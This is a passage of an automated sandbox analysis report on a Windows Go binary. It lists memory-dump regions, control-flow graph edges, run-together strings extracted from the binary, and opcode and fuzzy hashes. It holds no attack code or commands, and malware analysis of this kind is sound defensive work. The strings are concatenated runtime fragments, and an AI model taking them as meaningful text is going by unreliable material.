                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: call from unknown functioncorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type$call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid netw$call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach$debugCal$debugCal$debugCal$debugCal$debugCal$debugCall2048exchange fullfatal error: gethostbynamegetservbynamelevel 3 resetload64 failedmin too largenil stackbaseout of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListsxadd64 failedxchg64 failed}sched={pc:$l819$runtime.
                      • API String ID: 0-3115989702
                      • Opcode ID: 08672f7b5ab18e71500f3a55127b617c63bf8109f0e38876c862729eaca45f51
                      • Instruction ID: 9383396c62c1246d1bb6de20f67e1d8328f46afa8e09c4a92c5c8bbe79294fc5
                      • Opcode Fuzzy Hash: 08672f7b5ab18e71500f3a55127b617c63bf8109f0e38876c862729eaca45f51
                      • Instruction Fuzzy Hash: 0281E172A06B80C5CE35EB09D0643B8B773F395B94F58C65AEB4903725DB78CA81CB02

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 575 6b2600-6b2609 576 6b260f-6b2647 575->576 577 6b2cf1-6b2d0f call 6d9860 575->577 578 6b2c9b-6b2cf0 call 6b4520 call 6b4e20 call 6b45a0 call 687b20 call 6b4520 call 6b4780 call 6b45a0 call 6b2d80 576->578 579 6b264d-6b2654 576->579 577->575 578->577 582 6b265a-6b2667 579->582 583 6b2c45-6b2c96 call 6b4520 call 6b4e20 call 6b45a0 call 687b20 call 6b4520 call 6b4780 call 6b45a0 call 6b2d80 579->583 587 6b266d-6b2674 582->587 588 6b2b85-6b2c40 call 6b4520 call 6b4e20 call 6b45a0 call 687b20 call 6b4520 call 6b4780 call 6b45a0 call 6b4520 call 6b4e20 call 6b45a0 call 6b4520 call 6b4e20 call 6b45a0 call 6b4520 call 6b4780 call 6b45a0 call 6b2d80 582->588 583->578 592 6b267a-6b26c7 587->592 593 6b2b2f-6b2b80 call 6b4520 call 6b4e20 call 6b45a0 call 687b20 call 6b4520 call 6b4780 call 6b45a0 call 6b2d80 587->593 588->583 598 6b26c9-6b26d2 592->598 599 6b26d4-6b26d9 call 6dbbc0 592->599 593->588 604 6b26de-6b2701 call 6b1e80 598->604 599->604 615 6b2706-6b2712 604->615 620 6b2718-6b2720 615->620 621 6b297d-6b29af call 6b1c20 call 6b3120 615->621 627 6b27b7-6b27c5 620->627 628 6b2726-6b272d 620->628 631 6b27d2-6b27e8 call 6dbc00 627->631 632 6b27c7-6b27d0 627->632 629 6b272f 628->629 630 6b2733-6b273a 628->630 629->630 638 6b273c-6b2744 630->638 639 6b2746-6b2757 call 6dbc00 630->639 640 6b27ed-6b2800 631->640 632->640 647 6b275a-6b2760 638->647 639->647 651 6b2802-6b2809 call 6b2220 640->651 652 6b2840-6b285d call 6b2d20 640->652 647->627 660 6b2762-6b2769 647->660 677 6b280b-6b2818 651->677 678 6b2838-6b283d 651->678 681 6b2862-6b2874 652->681 668 6b276b-6b2773 660->668 669 6b2775-6b2786 call 6dbc00 660->669 675 6b2789-6b2794 668->675 669->675 686 6b27a0 call 6dbba0 675->686 687 6b2796-6b279a 675->687 677->681 688 6b281a-6b2836 call 6b1e80 677->688 678->681 692 6b287a-6b2881 681->692 693 6b2b1e-6b2b2a call 6b2d80 681->693 694 6b27a5-6b27b2 call 6b1740 686->694 687->694 688->681 702 6b288d-6b2894 call 6dbc00 692->702 703 6b2883-6b288b 692->703 693->593 694->615 707 6b2899-6b28ad 702->707 703->707 710 6b290a-6b2912 707->710 711 6b28af-6b28b6 707->711 710->615 713 6b2918-6b2927 710->713 714 6b28b8-6b28c0 711->714 715 6b28c2-6b28c8 call 6dbbe0 711->715 717 6b2929-6b2932 713->717 718 6b2934-6b293e call 6dbbc0 713->718 719 6b28cd-6b28dc 714->719 715->719 724 6b2940-6b2943 717->724 718->724 721 6b28de-6b28e2 719->721 722 6b28e4-6b28e9 call 6dbbe0 719->722 726 6b28ee-6b2905 call 6b1740 721->726 722->726 730 6b2955-6b296b 724->730 731 6b2945-6b2949 724->731 726->710 732 6b296d-6b296f 730->732 733 6b2971-6b297b 730->733 731->730 736 6b294b-6b294f 731->736 738 6b29b6-6b29b9 732->738 733->738 736->730 737 6b2aeb-6b2b19 call 6d96a0 call 6b2d80 736->737 737->693 741 6b2a68-6b2a77 738->741 742 6b29bf-6b29c2 738->742 745 6b2a79-6b2a7d 741->745 746 6b2a80 call 6dbbc0 741->746 742->741 747 6b29c8-6b29cc 742->747 750 6b2a85-6b2a8c 745->750 746->750 751 6b29ce-6b29d2 747->751 752 6b29d4-6b29dc 747->752 760 6b2adf-6b2ae9 750->760 761 6b2a8e-6b2a92 750->761 756 6b29b0-6b29b3 751->756 758 6b2a0a-6b2a15 752->758 759 6b29de-6b29e9 752->759 756->738 764 6b2a27-6b2a2f call 6dbbe0 758->764 765 6b2a17-6b2a25 758->765 768 6b29eb-6b29ef 759->768 769 6b29f1-6b2a08 call 6dbbe0 759->769 766 6b2ab4-6b2ada call 6d96a0 call 6b2d80 760->766 762 6b2aaf-6b2ab2 761->762 763 6b2a94-6b2aa0 761->763 762->760 762->766 771 6b2aa8-6b2aad call 6dbbc0 763->771 772 6b2aa2-6b2aa6 763->772 770 6b2a34-6b2a63 call 6b1740 764->770 765->770 766->760 768->770 769->770 770->756 771->750 772->750
                      Strings
                      • e(h, xrefs: 006B2D05
                      • panic: pdh.dllrunningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDup, xrefs: 006B2B34, 006B2B8A, 006B2C4A, 006B2CA5
                      • panic during preemptoffprocresize: invalid argreflect.Value.Interfacereflect.Value.NumMethodreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment, xrefs: 006B2C34
                      • bad defer entry in panicbypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baselevel 2 not synchronizedlink number out of r, xrefs: 006B2B1E
                      • bypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by win, xrefs: 006B2B0D
                      • recovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding pwglGetCurrentDC already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcd, xrefs: 006B2ACE
                      • panic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rota, xrefs: 006B2C8A
                      • panic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding, xrefs: 006B2B6F
                      • preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywglGetCurrentContextwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart, xrefs: 006B2BCF
                      • panic on system stackpreempt at unknown pcread-only file systemreflect.Value.Complexreflect.Value.Pointerreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartloc, xrefs: 006B2CDF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: bad defer entry in panicbypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baselevel 2 not synchronizedlink number out of r$bypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by win$e(h$panic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rota$panic during preemptoffprocresize: invalid argreflect.Value.Interfacereflect.Value.NumMethodreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment$panic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding$panic on system stackpreempt at unknown pcread-only file systemreflect.Value.Complexreflect.Value.Pointerreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartloc$panic: pdh.dllrunningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDup$preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywglGetCurrentContextwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart$recovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding pwglGetCurrentDC already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcd
                      • API String ID: 0-3431632730
                      • Opcode ID: af033656758d127cfac57e3fc960a83f2dc1298b50a17f52be2b6c599747d8c4
                      • Instruction ID: 542cfa4dbc2a2381910e58a8f609c9af259eb7263c5170d04f00cad2b684df6e
                      • Opcode Fuzzy Hash: af033656758d127cfac57e3fc960a83f2dc1298b50a17f52be2b6c599747d8c4
                      • Instruction Fuzzy Hash: 4F026AB2618B85C6DB60EF25E4503DA77B6F749B80F54512AEA8C07B6ACF38C4C5CB14

                      Control-flow Graph

                      Strings
                      • ) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetActi, xrefs: 0068AE87, 0068AED1
                      • bad TinySizeClassdebugPtrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission deniedreflect.Value.Intreflect.Value.Lenrefle, xrefs: 0068AFEC
                      • bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressno such ne, xrefs: 0068AE9D
                      • bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request code, xrefs: 0068AEEA, 0068AF5B, 0068AFCA
                      • system page size (tracebackancestorsuse of closed filevalue out of rangewglUseFontBitmapsW [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeAmbiguous alphabet.Bahia Standard Tim, xrefs: 0068AEB3, 0068AF05, 0068AF71
                      • system huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard Tim, xrefs: 0068AE6A
                      • ) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlyfailed to reserve page summary memoryi, xrefs: 0068AF25
                      • ) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared librarycompress, xrefs: 0068AF91
                      • failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketreflect: Elem of invalid type reflect: Len of non-, xrefs: 0068AFDB
                      • ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa, xrefs: 0068AF45, 0068AFAF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa$) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared librarycompress$) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlyfailed to reserve page summary memoryi$) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetActi$bad TinySizeClassdebugPtrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission deniedreflect.Value.Intreflect.Value.Lenrefle$bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressno such ne$bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request code$failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketreflect: Elem of invalid type reflect: Len of non-$system huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard Tim$system page size (tracebackancestorsuse of closed filevalue out of rangewglUseFontBitmapsW [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeAmbiguous alphabet.Bahia Standard Tim
                      • API String ID: 0-591411609
                      • Opcode ID: 3dc1e685e40604c235f7c69ab6780e078135736c355670947bb4a0b953414696
                      • Instruction ID: f4b47cee455ba373f970da637b719b5fe4fd6d74e8700a25e1954156e5cb7d8c
                      • Opcode Fuzzy Hash: 3dc1e685e40604c235f7c69ab6780e078135736c355670947bb4a0b953414696
                      • Instruction Fuzzy Hash: 4D619CB2715A0A96EB40BF50F8813D8636AFB09741F80652ADB4C07763EF3CD986C365

                      Control-flow Graph

                      Strings
                      • +-./5<=?CLMPSUZ[\, xrefs: 00691530
                      • span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxWCreateRectRgnDeleteServiceDestroyWindowDrawFocusRectEnumPrintersWEnumProcessesExitWindowsExFindNextFileW, xrefs: 00691471
                      • span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseColorWCoCreateGuidCreateBitmapCreateEventWCreateMutexWDeleteObjectEnableWindowExtCreatePenExtractIconWGetAddrI, xrefs: 0069148F
                      • runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutex) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602, xrefs: 00691515
                      • objectpopcntrdtscpselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625AvestanBengaliBrailleChanDirCopySidCy, xrefs: 0069156A
                      • runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size bec, xrefs: 006913F6
                      • found bad pointer in Go heap (incorrect use of unsafe or cgo?)reflect: reflect.Value.Pointer on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadcompileCallback: expected function with one uintptr-sized resultruntime.Se, xrefs: 006914FF
                      • to unallocated span37252902984619140625AddFontMemResourceExArabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCommDlgExtendedErrorCreateProcessAsUserWCryptAcquireContextWEgyptian_Hieroglyphs, xrefs: 0069143F
                      • to unused region of span2910383045673370361328125AUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWFindNextVolumeMountPointWFindVolumeMountPointCloseGODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedC, xrefs: 0069158F
                      • ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa, xrefs: 0069154F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxWCreateRectRgnDeleteServiceDestroyWindowDrawFocusRectEnumPrintersWEnumProcessesExitWindowsExFindNextFileW$ span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseColorWCoCreateGuidCreateBitmapCreateEventWCreateMutexWDeleteObjectEnableWindowExtCreatePenExtractIconWGetAddrI$ to unallocated span37252902984619140625AddFontMemResourceExArabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCommDlgExtendedErrorCreateProcessAsUserWCryptAcquireContextWEgyptian_Hieroglyphs$ to unused region of span2910383045673370361328125AUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWFindNextVolumeMountPointWFindVolumeMountPointCloseGODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedC$), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa$+-./5<=?CLMPSUZ[\$found bad pointer in Go heap (incorrect use of unsafe or cgo?)reflect: reflect.Value.Pointer on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadcompileCallback: expected function with one uintptr-sized resultruntime.Se$objectpopcntrdtscpselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625AvestanBengaliBrailleChanDirCopySidCy$runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutex) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602$runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size bec
                      • API String ID: 0-2422381767
                      • Opcode ID: d3551614b923a7e40790ed5fea89d3ff1849824198b86e3cc87a74ab71e7d907
                      • Instruction ID: f1a87f3da1fd84b97a51539f10204789b9e1641bdaec4118ddfac467ed0ff062
                      • Opcode Fuzzy Hash: d3551614b923a7e40790ed5fea89d3ff1849824198b86e3cc87a74ab71e7d907
                      • Instruction Fuzzy Hash: 26413E72629B4087D790BF61F44139DBB6AFB89B40F841029EB4D03767DF28D4858765

                      Control-flow Graph

                      • Executed
                      • Not Executed
